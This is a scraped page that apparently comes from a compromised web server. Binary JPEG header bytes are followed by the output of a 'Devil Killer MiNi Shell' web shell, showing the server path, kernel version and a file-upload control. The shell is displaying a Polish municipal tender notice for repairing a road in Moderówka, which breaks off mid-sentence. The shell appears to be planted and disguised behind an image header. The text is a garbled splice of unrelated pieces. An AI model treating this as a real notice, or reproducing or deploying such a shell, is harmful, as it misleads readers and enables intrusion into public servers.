JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210910/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210910/0017773102-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont odcinka drogi gminnej G114655R w km. Od 1+604 do 2+022 i od 2+054 do 2+584 zlokalizowanej w m. Moderówka na dz. o nr ewid. 377, 306, 309 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Jedlicze</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 370440554</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Rynek 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jedlicze</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-460</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL821 - Krośnieński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@jedlicze.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.jedlicze.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont odcinka drogi gminnej G114655R w km. Od 1+604 do 2+022 i od 2+054 do 2+584 zlokalizowanej w m. Moderówka na dz. o nr ewid. 377, 306, 309 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4fd32913-1243-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00177731</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00005496/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.11 Remont odcinka drogi gminnej G114655R w km. Od 1+604 do 2+022 i od 2+054 do 2+584 zlokalizowanej w m. Moderówka na dz. o nr ewid. 377, 306, 309</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://jedlicze.bip.gov.pl/search/publiccontracts/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do<br/>następującychformularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz<br/>do„Formularza do komunikacji”.<br/>adres skrytki ePUAP: /f9oo3ur19e/SkrytkaESP</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">24. 1 Zamawiający przetwarza dane osobowe zebrane w<br/>postępowaniu o udzielenie zamówienia w sposób gwarantujący zabezpieczenie przed ich bezprawnym<br/>rozpowszechnianiem.<br/>24. 2 Administratorem Państwa danych jest Burmistrz Gminy Jedlicze , ul. Rynek 6, 38-460 Jedlicze.<br/>24. 3 Inspektorem ochrony danych osobowych jest, dostępny pod numerem telefonu 13 44 847 22 oraz<br/>adresem e-mail: iodo@jedlicze.pl.<br/>24. 4 Celem przetwarzania danych jest przeprowadzenie postępowania o udzielenie zamówienia<br/>publicznego na „Remont odcinka drogi gminnej G114655R w km. Od 1+604 do 2+022 i od 2+054 do<br/>2+584 zlokalizowanej w m. Moderówka na dz. o nr ewid. 377, 306, 309 ”, wybór najkorzystniejszej<br/>oferty, zawarcie oraz realizacja umowy.<br/>24. 5 Odbiorcami Państwa danych osobowych mogą być osoby lub podmioty, którym udostępnionazostanie dokumentacja w oparciu o art. 18 oraz 74 ustawy, Państwa dane mogą być zamieszczane w<br/>Biuletynie Zamówień Publicznych, odbiorcą danych może być bank realizujący usługi bankowe dla<br/>Urzędu Gminy w Jedliczu – tj. Bank Spółdzielczy O/Jedlicze.<br/>24. 6 Państwa dane nie będą przekazywane do państw spoza Europejskiego Obszaru Gospodarczego<br/>(tj. państw trzecich).<br/>24. 7 Dane osobowe będą przechowywane przez czas niezbędny do realizacji celów określonych<br/>powyżej, a po tym czasie przez okres wymagany:<br/>a) art. 78 ust. 1 ustawy, tj. protokół wraz z załącznikami przechowuje się przez okres 4 lat od dnia<br/>zakończenia postępowania chyba że umowa zawarta jest na dłuży okres czasu wtedy administrator<br/>przechowuje protokół do zakończenia umowy;<br/>b) umowy zgodnie z kategorią archiwalną B10 – tj. 10 lat od roku następującego po zakończeniu<br/>umowy zawartej w trybie zamówienia publicznego,<br/>c) pozostała dokumentacja dotycząca zamówień publicznych zgodnie z kategorią B5 – tj. 5 lat od roku<br/>następującego po zakończeniu sprawy.<br/>24. 8 W celu złożenia oferty podanie danych osobowych jest wymogiem niezbędnym.<br/>24. 9 W związku z przetwarzaniem Państwa danych osobowych przysługują następujące uprawnienia:</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">: a) prawo dostępu do danych osobowych - w przypadku<br/>korzystania przez osobę, której dane osobowe są przetwarzane przez zamawiającego, z uprawnienia,<br/>o którym mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, zamawiający może żądać od osoby<br/>występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy<br/>lub daty zakończonego postępowania o udzielenie zamówienia;<br/>b) prawo do żądania sprostowania danych osobowych - skorzystanie przez osobę, której dane<br/>osobowe są przetwarzane, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o<br/>którym mowa w art. 16 rozporządzenia 2016/679, nie może naruszać integralności protokołu<br/>postępowania oraz jego załączników, nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie<br/>niezgodnym z ustawą;<br/>c) prawo do usunięcia danych osobowych - w przypadku gdy ustała podstawa do ich przetwarzania,<br/>dane osobowe przetwarzane są niezgodnie z prawem, dane osobowe muszą być usunięte w celu<br/>wywiązania się z obowiązku wynikającego z przepisów prawa;<br/>d) prawo do żądania ograniczenia przetwarzania danych osobowych - w przypadku, gdy osoba, której<br/>dane dotyczą kwestionuje prawidłowość danych osobowych, przetwarzanie danych jest niezgodne z<br/>prawem, a osoba, której dane dotyczą, sprzeciwia się usunięciu danych, żądając w zamian ich<br/>ograniczenia, Administrator nie potrzebuje już danych dla swoich celów, ale osoba, której dane<br/>dotyczą, potrzebuje ich do ustalenia, obrony lub dochodzenia roszczeń.<br/>e) Zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia<br/>2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.<br/>W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1<br/>rozporządzenia 2016/679, spowoduje ograniczenie przetwarzania danych osobowych zawartych w<br/>protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o<br/>udzielenie zamówienia zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o<br/>których mowa w art. 18 ust. 2 rozporządzenia 2016/679.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RP.271.4.18.2021.MŻM</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest remont odcinka drogi gminnej G114655R w km. Od 1+604 do<br/>2+022 i od 2+054 do 2+584 zlokalizowanej w m. Moderówka na dz. o nr ewid. 377, 306, 309.<br/>Szczegółowy opis przedmiotu zamówienia znajduje się w dokumentacji stanowiącej załącznik nr<br/>6 do SWZ.<br/>Podpisanie umowy z Wykonawcą jest uzależnione od otrzymania przez Gminę Jedlicze<br/>dofinansowania<br/>z Rządowego Programu Rozwoju Dróg.<br/>W przypadku nie otrzymania dofinansowania Zamawiający zastrzega możliwość unieważnienia<br/>postępowania.<br/>Na wykonanie zadania Zamawiający zamierza przeznaczyć kwotę w wysokości 611 497,32 zł<br/>brutto pod warunkiem uzyskania dofinansowania z Rządowego Programu Rozwoju Dróg. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W celu potwierdzenia spełnienia tego warunku Wykonawca wykaże, że:<br/>a) Wykonał w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym czasie, co najmniej 2 roboty budowlane<br/>polegające na budowie lub remoncie lub przebudowie drogi za min 400 tys. zł każda w zakres<br/>której wchodziła stabilizacja spoiwem hydraulicznym podłoża oraz układanie nawierzchni min-bit<br/>.<br/>b) Wykonawca winien wykazać, że dysponuje co najmniej jedną osobą posiadającą uprawnienia<br/>do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń.<br/>Wykonawca będzie zobowiązany w trakcie realizacji zamówienia zapewnić kadrę, która będzie<br/>w stanie wykonać zamówienie i sprostać wymaganiom zawartym w opisie przedmiotu<br/>zamówienia także w zakresie zapewnienia osób posiadających uprawnienia, umiejętności i<br/>kwalifikacje jakie okażą się konieczne na etapie realizacji prac do ich odbioru. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">wykazu robót budowlanych wykonanych nie wcześniej niż w okresie<br/>ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wraz z podaniem ich<br/>rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest wstanie uzyskać tych dokumentów –inne odpowiednie dokumenty;<br/>(załącznik nr 3 do SWZ);<br/>wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia<br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami- ( załącznik nr 4 do SWZ)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie<br/>zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie<br/>wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub<br/>opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że<br/>odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu<br/>albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub<br/>opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności;<br/>2) zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu<br/>Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej<br/>Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z<br/>opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy ,<br/>wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z<br/>opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym<br/>dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed<br/>upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływemterminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne<br/>lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności;<br/>3) odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli<br/>odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw<br/>wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy. Dla potwierdzenia braku podstaw do<br/>wykluczenia Wykonawcy z udziału w postępowaniu w zakresie art. 109 ust. 1 pkt 4 ustawy<br/>Zamawiający zgodnie z art. 127 ust. 1 skorzysta z dokumentów bezpłatnych i ogólnodostępnych baz<br/>danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o<br/>informatyzacji działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w<br/>jednolitym dokumencie dane umożliwiające dostęp do tych środków.<br/>.<br/>7. 8 Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej<br/>Polskiej, zamiast dokumentów, o których mowa w ust. 7.6 pkt 1) 2) 3) składa , dokument lub dokumenty<br/>wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające<br/>odpowiednio, że:<br/>1) nie naruszył obowiązków dotyczących płatności podatków, opłat lub składek na ubezpieczenie<br/>społeczne lub zdrowotne,<br/>2)nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd,<br/>nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje<br/>się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach<br/>miejsca wszczęcia tej procedury.<br/>7. 9 Dokument, o którym mowa w ust. 7.8 powinien być wystawiony nie wcześniej niż 3 miesiące przed<br/>upływem terminu składania ofert.<br/>7. 10 Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów, o których mowa w ust. 7.6 pkt 1) 2) 3) zastępuje się je odpowiednio w całości lub w<br/>części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo<br/>osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć,<br/>złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania<br/>nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub<br/>administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze<br/>względu na siedzibę lub miejsce zamieszkania wykonawcy. Przepis ust. 7.9 stosuje się odpowiednio.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 9. 1 Wykonawca w terminie do upływu terminu składania ofert wniesie wadium w wysokości:<br/>10.000 zł (słownie: dziesięć tysięcy złotych).<br/>9. 2 Wadium może być wnoszone w jednej lub kilku formach:<br/>1) pieniądza,<br/>2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo – kredytowej,<br/>z tym że poręczenie kasy musi być zawsze poręczeniem pieniężnym,<br/>3) gwarancjach bankowych,<br/>4) gwarancjach ubezpieczeniowych,<br/>5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu<br/>Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).<br/>9. 3 Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy<br/>zamawiającego prowadzony przez Bank Spółdzielczy O/Jedlicze Nr konta bankowego: 48 8636<br/>1028 2002 1400 0101 0010 do upływu terminu składania ofert w tytule przelewu należy wpisać<br/>Wadium - Remont odcinka drogi gminnej w m. Moderówka UWAGA:<br/>Wadium wnoszone w pieniądzu ściśle z dyspozycją art. 97 ust. 8 ustawy Prawo zamówień<br/>publicznych, wpłaca się przelewem na rachunek bankowy wskazany przez Zamawiającego .<br/>W myśl art. 63. ust. 3 pkt.1 ustawy Prawo bankowe z dnia 29 sierpnia 1997 (t.j. Dz. U z 2002 Nr<br/>72 poz. 665) polecenie przelewu jest jedną z form rozliczenia bezgotówkowego. Zgodnie z art.<br/>63c Prawa bankowego polecenie przelewu stanowi udzieloną bankowi dyspozycję dłużnika<br/>obciążenia jego rachunku określoną kwotą i uznania tą kwotą rachunku wierzyciela. Oznacza to,<br/>że wpłata gotówkowa wadium wnoszona na poczcie lub w banku nie stanowi polecenia<br/>przelewu w rozumieniu wyżej cytowanych artykułów.<br/>9. 4 Wadium wniesione w formie gwarancji ubezpieczeniowej lub bankowej albo poręczenia<br/>musi w swej treści zawierać informacje o beneficjencie gwarancji lub poręczenia, przedmiocie<br/>gwarancji, wysokości wadium, okresie 